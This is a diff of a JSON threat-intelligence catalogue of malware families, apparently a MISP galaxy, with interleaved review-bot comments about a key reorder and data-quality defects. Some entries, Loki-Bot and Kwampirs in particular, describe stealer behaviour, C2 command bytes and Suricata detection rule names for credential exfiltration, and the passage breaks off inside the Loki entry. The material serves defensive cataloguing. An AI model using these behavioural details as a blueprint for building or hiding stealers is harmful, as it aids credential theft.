 "uuid": "07f6bbff-a09a-4580-96ea-62795a8dae11",
- "value": "KINS",
- "description": ""
+ "value": "KINS"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.klrd",
 "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
 "https://www.morphick.com/resources/news/klrd-keylogger"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "70459959-5a20-482e-b714-2733f5ff310e",
- "value": "KLRD",
- "description": ""
+ "value": "KLRD"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.koadic",
 "https://researchcenter.paloaltonetworks.com/2018/06/unit42-sofacy-groups-parallel-attacks/",
 "https://github.com/zerosum0x0/koadic"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "3b5faa15-e87e-4aaf-b791-2c5e593793e6",
- "value": "Koadic",
- "description": ""
+ "value": "Koadic"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kokokrypt",
 "https://twitter.com/struppigel/status/812726545173401600"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "f7674d06-450a-4150-9180-afef94cce53c",
- "value": "KokoKrypt",
- "description": ""
+ "value": "KokoKrypt"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.konni",
 "http://blog.talosintelligence.com/2017/05/konni-malware-under-radar-for-years.html",
 "http://blog.talosintelligence.com/2017/07/konni-references-north-korean-missile-capabilities.html",
 "https://vallejo.cc/2017/07/08/analysis-of-new-variant-of-konni-rat/",
 "https://blog.fortinet.com/2017/08/15/a-quick-look-at-a-new-konni-rat-variant"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "f982fa2d-f78f-4fe1-a86d-d10471a3ebcf",
- "value": "Konni",
- "description": ""
+ "value": "Konni"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.koobface"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "9430ce27-c8c5-44fb-9255-47d76a8903b3",
- "value": "KoobFace",
- "description": ""
+ "value": "KoobFace"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Bisonal"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.korlia",
 "https://securitykitten.github.io/2014/11/25/curious-korlia.html",
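Review bot: The ISFB synonym list carried over in this hunk contains `"Pandemyia"`, while the entry's own RSA reference slug spells the family `pandemiya`; MISP galaxy lookups match synonym strings exactly, so whichever spelling an analyst tags with, the other form silently fails to correlate. If both spellings are in circulation, add `"Pandemiya"` as a further synonym rather than replacing the existing one, since the description text also uses `Pandemyia(*)`; confirm the canonical form against the Malpedia page in refs. Separately, the Kardon Loader description's `starting in late April` carries no year and will read as current-year to anyone consuming this cluster later; pin it to the year the ASERT post reports. The key reordering itself is behavior-neutral and needs no change.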
@@ -8622,77 +8622,77 @@
 "https://researchcenter.paloaltonetworks.com/2018/07/unit42-bisonal-malware-used-attacks-russia-south-korea/",
 "https://www.rsaconference.com/writable/presentations/file_upload/cle-t04_final_v1.pdf",
 "http://asec.ahnlab.com/tag/Operation%20Bitter%20Biscuit"
- ]
+ ],
+ "synonyms": [
+ "Bisonal"
+ ],
+ "type": []
 },
 "uuid": "52d98d2f-db62-430d-8658-5cadaeff6cd7",
- "value": "Korlia",
- "description": ""
+ "value": "Korlia"
 },
 {
+ "description": "Kovter is a Police Ransomware\r\n\r\nFeb 2012 - Police Ransomware\r\nAug 2013 - Became AD Fraud\r\nMar 2014 - Ransomware to AD Fraud malware\r\nJune 2014 - Distributed from sweet orange exploit kit\r\nDec 2014 - Run affiliated node\r\nApr 2015 - Spread via fiesta and nuclear pack\r\nMay 2015 - Kovter become fileless\r\n2016 - Malvertising campaign on Chrome and Firefox\r\nJune 2016 - Change in persistence\r\nJuly 2017 - Nemucod and Kovter was packed together\r\nJan 2018 - Cyclance report on Persistence",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kovter",
 "https://blog.malwarebytes.com/threat-analysis/2016/07/untangling-kovter/",
 "https://blog.malwarebytes.com/threat-analysis/2015/01/major-malvertising-campaign-hits-sites-with-combined-total-monthly-traffic-of-1-5bn-visitors/",
 "https://github.com/ewhitehats/kovterTools/blob/master/KovterWhitepaper.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "af3a0643-7a80-4b8f-961b-aea18e78715e",
- "value": "Kovter",
- "description": "Kovter is a Police Ransomware\r\n\r\nFeb 2012 - Police Ransomware\r\nAug 2013 - Became AD Fraud\r\nMar 2014 - Ransomware to AD Fraud malware\r\nJune 2014 - Distributed from sweet orange exploit kit\r\nDec 2014 - Run affiliated node\r\nApr 2015 - Spread via fiesta and nuclear pack\r\nMay 2015 - Kovter become fileless\r\n2016 - Malvertising campaign on Chrome and Firefox\r\nJune 2016 - Change in persistence\r\nJuly 2017 - Nemucod and Kovter was packed together\r\nJan 2018 - Cyclance report on Persistence"
+ "value": "Kovter"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kpot_stealer",
 "https://www.flashpoint-intel.com/blog/malware-campaign-targets-jaxx-cryptocurrency-wallet-users/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "b1fe4226-1783-48d4-b1d2-417703a03b3d",
- "value": "KPOT Stealer",
- "description": ""
+ "value": "KPOT Stealer"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "BlackMoon"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.krbanker",
 "https://www.proofpoint.com/us/threat-insight/post/Updated-Blackmoon-Banking-Trojan",
 "http://training.nshc.net/ENG/Document/virus/20140305_Internet_Bank_Pharming_-_BlackMoon_Ver_1.0_External_ENG.pdf",
 "https://zairon.wordpress.com/2014/04/15/trojan-banking-47d18761d46d8e7c4ad49cc575b0acc2bb3f49bb56a3d29fb1ec600447cb89a4/",
 "http://researchcenter.paloaltonetworks.com/2016/05/unit42-krbanker-targets-south-korea-through-adware-and-exploit-kits-2/"
- ]
+ ],
+ "synonyms": [
+ "BlackMoon"
+ ],
+ "type": []
 },
 "uuid": "f4008c19-e81a-492a-abfe-f177e1ac5bce",
- "value": "KrBanker",
- "description": ""
+ "value": "KrBanker"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.krdownloader",
 "https://www.fidelissecurity.com/threatgeek/2017/05/blackmoon-rising-banking-trojan-back-new-framework"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "c346faf0-9eb4-4f8a-8547-30e6641b8972",
- "value": "KrDownloader",
- "description": ""
+ "value": "KrDownloader"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "Osiris"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kronos",
 "https://www.securonix.com/securonix-threat-research-kronos-osiris-banking-trojan-attack",
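Review bot: The Kovter description kept on the new side opens with `Kovter is a Police Ransomware`, which its own timeline contradicts from Aug 2013 onward (ad fraud, fileless, malvertising), so the headline misclassifies the family for anyone who reads only the first line; the final timeline entry also misspells the vendor as `Cyclance`. Suggest rewording the opening to `Kovter began in 2012 as police ransomware and later evolved into a fileless ad-fraud trojan; timeline:` and correcting `Cyclance` to `Cylance`. The vendor spelling is inferred from the other Cylance refs in this file rather than from this hunk, so confirm it against the 2018 report before changing.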
@@ -8706,99 +8706,101 @@
 "https://securityintelligence.com/the-father-of-zeus-kronos-malware-discovered/",
 "https://www.proofpoint.com/us/threat-insight/post/kronos-banking-trojan-used-to-deliver-new-point-of-sale-malware",
 "https://blog.malwarebytes.com/cybercrime/2017/08/inside-kronos-malware/"
- ]
+ ],
+ "synonyms": [
+ "Osiris"
+ ],
+ "type": []
 },
 "uuid": "62a7c823-9af0-44ee-ac05-8765806d2a17",
- "value": "Kronos",
- "description": ""
+ "value": "Kronos"
 },
 {
+ "description": "",
 "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8"
+ ],
 "synonyms": [
 "Barys",
 "Gofot",
 "Kuaibpy"
 ],
- "type": [],
- "refs": [
- "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuaibu8"
- ]
+ "type": []
 },
 "uuid": "7d8943a4-b710-48d3-9352-e9b42516d2b7",
- "value": "Kuaibu",
- "description": ""
+ "value": "Kuaibu"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kuluoz"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "f9b3757e-99c7-4999-8b79-87609407f895",
- "value": "Kuluoz",
- "description": ""
+ "value": "Kuluoz"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kurton",
 "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "1fc49b8c-647a-4484-a2f6-e6f2311f8b58",
- "value": "Kurton",
- "description": ""
+ "value": "Kurton"
 },
 {
+ "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI.",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.kwampirs",
 "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "2fc93875-eebb-41ff-a66e-84471c6cd5a3",
- "value": "Kwampirs",
- "description": "Kwampirs is a family of malware which uses SMB to spread. It typically will not execute or deploy in environments in which there is no publicly available admin$ share. It is a fully featured backdoor which can download additional modules. Typical C2 traffic is over HTTP and includes \"q=[ENCRYPTED DATA]\" in the URI."
+ "value": "Kwampirs"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lambert",
 "https://securelist.com/blog/research/77990/unraveling-the-lamberts-toolkit/",
 "https://www.symantec.com/connect/blogs/longhorn-tools-used-cyberespionage-group-linked-vault-7",
 "http://adelmas.com/blog/longhorn.php",
 "https://www.youtube.com/watch?v=jeLd-gw2bWo"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "3af9397a-b4f7-467d-93af-b3d77dcfc38d",
- "value": "Lambert",
- "description": ""
+ "value": "Lambert"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lamdelin",
 "http://news.thewindowsclub.com/poorly-coded-lamdelin-lockscreen-ransomware-alt-f4-88576/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "da79cf10-df9f-4cd3-bbce-ae9f357633f0",
- "value": "Lamdelin",
- "description": ""
+ "value": "Lamdelin"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.latentbot",
 "http://malware-traffic-analysis.net/2017/04/25/index.html",
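Review bot: After the key sort, every entry without a write-up now leads with `"description": ""` (Kuaibu, Kuluoz, Kurton, Lambert and Lamdelin in this hunk), so an empty string stands in for "unknown" next to the equally empty `"synonyms": []` and `"type": []` arrays. Consumers that render or index the cluster cannot distinguish "no description yet" from a deliberately blank one; if the galaxy schema permits it, omit the key for entries with nothing to say, or fill it from the refs already attached, rather than sorting an empty sentinel to the front of each object. For Kwampirs, the `admin$` share precondition and the `q=[ENCRYPTED DATA]` URI pattern are the only detection-relevant details in this hunk and are stated as invariants; attributing them to the Symantec Orangeworm report in refs (`as reported by Symantec, ...`) would make clear they are observed behaviour, not a guarantee.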
@@ -8806,131 +8808,131 @@
 "https://blog.malwarebytes.com/threat-analysis/2017/06/latentbot/",
 "https://www.cert.pl/news/single/latentbot-modularny-i-silnie-zaciemniony-bot/",
 "https://cys-centrum.com/ru/news/module_trojan_for_unauthorized_access"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "7fc74551-013f-4dd1-8da9-9266edcc45d0",
- "value": "LatentBot",
- "description": ""
+ "value": "LatentBot"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lazarus",
 "https://www.bleepingcomputer.com/news/security/polish-banks-infected-with-malware-hosted-on-their-own-governments-site/",
 "https://twitter.com/PhysicalDrive0/status/828915536268492800",
 "https://baesystemsai.blogspot.com/2017/02/lazarus-watering-hole-attacks.html",
 "http://baesystemsai.blogspot.de/2016/05/cyber-heist-attribution.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "0caf0292-b01a-4439-b56f-c75b71900bc0",
- "value": "Lazarus",
- "description": ""
+ "value": "Lazarus"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.laziok",
 "https://www.symantec.com/connect/blogs/new-reconnaissance-threat-trojanlaziok-targets-energy-sector",
 "https://www.mysonicwall.com/sonicalert/searchresults.aspx?ev=article&id=802"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "686a9217-3978-47c0-9989-dd2a3438ba72",
- "value": "Laziok",
- "description": ""
+ "value": "Laziok"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.leash",
 "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "8faf7592-be5c-44af-b1ca-2bd8caec195d",
- "value": "Leash",
- "description": ""
+ "value": "Leash"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [
- "shoco"
- ],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.leouncia",
 "https://www.rsaconference.com/writable/presentations/file_upload/crwd-t11-hide_and_seek-how_threat_actors_respond_in_the_face_of_public_exposure.pdf",
 "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor.html",
 "https://www.fireeye.com/blog/threat-research/2010/12/leouncia-yet-another-backdoor-part-2.html"
- ]
+ ],
+ "synonyms": [
+ "shoco"
+ ],
+ "type": []
 },
 "uuid": "41da41aa-0729-428a-8b82-636600f8e230",
- "value": "Leouncia",
- "description": ""
+ "value": "Leouncia"
 },
 {
+ "description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam.",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.lethic",
 "https://www.arbornetworks.com/blog/asert/lethic-spambot-analysis-pills-watches-and-diplomas/",
 "http://resources.infosecinstitute.com/win32lethic-botnet-analysis/",
 "http://www.vkremez.com/2017/11/lets-learn-lethic-spambot-survey-of.html",
 "http://www.malware-traffic-analysis.net/2017/11/02/index.html"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "342f5c56-861c-4a06-b5db-85c3c424f51f",
- "value": "Lethic",
- "description": "Lethic is a spambot dating back to 2008. It is known to be distributing low-level pharmaceutical spam."
+ "value": "Lethic"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.limitail"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "dcd1f76d-5a40-4c58-b01e-a749871fe50b",
- "value": "Limitail",
- "description": ""
+ "value": "Limitail"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.listrix",
 "https://www.symantec.com/connect/blogs/dragonfly-western-energy-sector-targeted-sophisticated-attack-group"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "54c8a055-a4be-4ec0-9943-ecad929e0dac",
- "value": "Listrix",
- "description": ""
+ "value": "Listrix"
 },
 {
+ "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. \r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.litehttp",
 "https://malware.news/t/recent-litehttp-activities-and-iocs/21053",
 "https://github.com/zettabithf/LiteHTTP"
- ]
+ ],
+ "synonyms": [],
+ "type": []
 },
 "uuid": "2f9e1221-0a59-447b-a9e8-bedb010cd3d8",
- "value": "LiteHTTP",
- "description": "According to AlienVault, LiteHTTP bot is a new HTTP bot programmed in C#. The bot has the ability to collect system information, download and execute programs, and update and kill other bots present on the system. \r\n\r\nThe source is on GitHub: https://github.com/zettabithf/LiteHTTP"
+ "value": "LiteHTTP"
 },
 {
+ "description": "",
 "meta": {
- "synonyms": [],
- "type": [],
 "refs": [
 "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky",
 "http://securityaffairs.co/wordpress/49094/malware/zepto-ransomware.html",
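Review bot: The `Lazarus` entry carried over in this hunk has an empty description despite five references, and its value is the same string as the threat-actor group's name, so a reader of this malware cluster cannot tell which family or tool set the entry denotes or how it relates to the actor galaxy. Going only by the ref slugs (watering-hole attacks on banks, 2016 cyber-heist attribution) it appears to be an umbrella for Windows tooling attributed to the group; if that is what it covers, a one-line description such as `Windows malware attributed to the Lazarus group (bank watering-hole and cyber-heist campaigns); see refs` would make the entry self-describing, but confirm against the Malpedia page before adding it. The LiteHTTP description also embeds the GitHub URL that is already listed in its refs; keeping the link in refs only avoids the two copies drifting apart.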
@@ -8941,101 +8943,97 @@ "https://blog.botfrei.de/2017/08/weltweite-spamwelle-verbreitet-teufliche-variante-des-locky/", "https://www.bleepingcomputer.com/news/security/locky-ransomware-switches-to-the-lukitus-extension-for-encrypted-files/", "https://www.cylance.com/en_us/blog/threat-spotlight-locky-ransomware.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "24c9bb9f-1f9a-4e01-95d8-86c51733e11c", - "value": "Locky", - "description": "" + "value": "Locky" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_decryptor" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "cd55cfa8-1e20-417b-9997-754b600f9f49", - "value": "Locky (Decryptor)", - "description": "" + "value": "Locky (Decryptor)" }, { + "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky.", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.locky_loader" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "62c17ebb-4ea5-43bd-96fc-d9ac8d464aa2", - "value": "Locky Loader", - "description": "For the lack of a better name, this is a VBS-based loader that was used in beginning of 2018 to deliver win.locky." + "value": "Locky Loader" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lock_pos", "https://www.arbornetworks.com/blog/asert/lockpos-joins-flock/", "https://www.cylance.com/en_us/blog/threat-spotlight-lockpos-point-of-sale-malware.html", "https://www.cyberbit.com/new-lockpos-malware-injection-technique/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "d2c111bf-ba0d-498a-8ca8-4cc508855872", - "value": "LockPOS", - "description": "" + "value": "LockPOS" }, { + "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. 
Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented.", "meta": { - "synonyms": [ - "Nymeria" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.loda", "https://www.proofpoint.com/us/threat-insight/post/introducing-loda-malware", "https://zerophagemalware.com/2018/01/23/maldoc-rtf-drop-loda-logger/" - ] + ], + "synonyms": [ + "Nymeria" + ], + "type": [] }, "uuid": "8098d303-cb5f-4eff-b62e-96bb5ef4329f", - "value": "Loda", - "description": "Loda is a previously undocumented AutoIT malware with a variety of capabilities for spying on victims. Proofpoint first observed Loda in September of 2016 and it has since grown in popularity. The name Loda is derived from a directory to which the malware author chose to write keylogger logs. It should be noted that some antivirus products currently detect Loda as “Trojan.Nymeria”, although the connection is not well-documented." 
+ "value": "Loda" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.logedrut", "https://researchcenter.paloaltonetworks.com/2016/09/mile-tea-cyber-espionage-campaign-targets-asia-pacific-businesses-and-government-agencies/" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "70cd1eb4-0410-47c6-8817-418380240d85", - "value": "Logedrut", - "description": "" + "value": "Logedrut" }, { + "description": "", "meta": { - "synonyms": [], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.logpos", "https://securitykitten.github.io/2015/11/16/logpos-new-point-of-sale-malware-using-mailslots.html" - ] + ], + "synonyms": [], + "type": [] }, "uuid": "2789b246-d762-4d38-8cc8-302293e314da", - "value": "LogPOS", - "description": "" + "value": "LogPOS" }, { + "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. 
For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:\r\n\r\nBYTE\tPAYLOAD TYPE\r\n0x26\tStolen Cryptocurrency Wallet\r\n0x27\tStolen Application Data\r\n0x28\tGet C2 Commands from C2 Server\r\n0x29\tStolen File\r\n0x2A\tPOS (Point of Sale?)\r\n0x2B\tKeylogger Data\r\n0x2C\tScreenshot\r\n\r\nThe 11th byte of the HTTP Payload begins the Binary ID. 
This might be useful in tracking campaigns or specific threat actors. This value value is typically “ckav.ru”. If you come across a Binary ID that is different from this, take note!\r\n\r\nLoki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.\r\n\r\nThe Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bot’s C2 infrastructure.\r\n\r\nLoki-Bot can accept the following instructions from the C2 Server:\r\n\r\nBYTE\tINSTRUCTION DESCRIPTION\r\n0x00\tDownload EXE & Execute\r\n0x01\tDownload DLL & Load #1\r\n0x02\tDownload DLL & Load #2\r\n0x08\tDelete HDB File\r\n0x09\tStart Keylogger\r\n0x0A\tMine & Steal Data\r\n0x0E\tExit Loki-Bot\r\n0x0F\tUpgrade Loki-Bot\r\n0x10\tChange C2 Polling Frequency\r\n0x11\tDelete Executables & Exit\r\n\r\nSuricata Signatures\r\nRULE SID\tRULE NAME\r\n2024311\tET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected\r\n2024312\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M1\r\n2024313\tET TROJAN Loki Bot Request for C2 Commands Detected M1\r\n2024314\tET TROJAN Loki Bot File Exfiltration Detected\r\n2024315\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M1\r\n2024316\tET TROJAN Loki Bot Screenshot Exfiltration Detected\r\n2024317\tET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M2\r\n2024318\tET TROJAN Loki Bot Request for C2 Commands Detected M2\r\n2024319\tET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2", "meta": { - "synonyms": [ - "Loki", - "LokiPWS", - "LokiBot" - ], - "type": [], "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws", "https://blog.fortinet.com/2017/05/17/new-loki-variant-being-spread-via-pdf-file", 
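Review bot: The Loki Password Stealer (PWS) description added on the new side of this hunk carries two pre-existing text defects that the key reorder copies verbatim: the duplicated word in `This value value is typically “ckav.ru”` and the stray space in the path example `“%APPDATA%\\ C98066\\”`, which inserts a character that the 8th–13th-character derivation rule stated just before it does not produce. Since this very long string is rewritten by the commit anyway, correcting both (`This value is typically` and `“%APPDATA%\\C98066\\”`) would avoid a second touch of the line; the Mutex example `“B7E1C2CC98066B250DDB2123“` also closes with an opening-quote glyph and could be fixed in the same pass. These are data issues carried over from the old key order rather than something the sort introduced, so they are presumably out of scope for an automated reorder. The Loki entry's meta block and closing continue in the next hunk.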
@@ -9049,16 +9047,20 @@ "https://www.sans.org/reading-room/whitepapers/malicious/loki-bot-information-stealer-keylogger-more-37850", "https://github.com/d00rt/hijacked_lokibot_version/blob/master/doc/LokiBot_hijacked_2018.pdf", "https://researchcenter.paloaltonetworks.com/2018/08/unit42-gorgon-group-slithering-nation-state-cybercrime/" - ] + ], + "synonyms": [ + "Loki", + "LokiPWS", + "LokiBot" + ], + "type": [] }, "uuid": "b8fa5036-813f-4887-b4d4-bb17b4a7eba0", - "value": "Loki Password Stealer (PWS)", - "description": "\"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets.\" - PhishMe\r\n\r\nLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.\r\n\r\nLoki-Bot accepts a single argument/switch of ‘-u’ that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.\r\n\r\nThe Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: “B7E1C2CC98066B250DDB2123“.\r\n\r\nLoki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: “%APPDATA%\\ C98066\\”.\r\n\r\nThere can be four files within the hidden %APPDATA% directory at any given time: “.exe,” “.lck,” “.hdb” and “.kdb.” They will be named after characters 13 thru 18 of the Mutex. 
For example: “6B250D.” Below is the explanation of their purpose:\r\n\r\nFILE EXTENSION\tFILE DESCRIPTION\r\n.exe\tA copy of the malware that will execute every time the user account is logged into\r\n.lck\tA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts\r\n.hdb\tA database of hashes for data that has already been exfiltrated to the C2 server\r\n.kdb\tA database of keylogger data that has yet to be sent to the C2 server\r\n\r\nIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.\r\n\r\nThe first packet transmitted by Loki-Bot contains application data.\r\n\r\nThe second packet transmitted by Loki-Bot contains decrypted Windows credentials.\r\n\r\nThe third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.\r\n\r\nCommunications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.\r\n\r\nThe first WORD of the HTTP Payload represents the Loki-Bot version.\r\n\r\nThe second 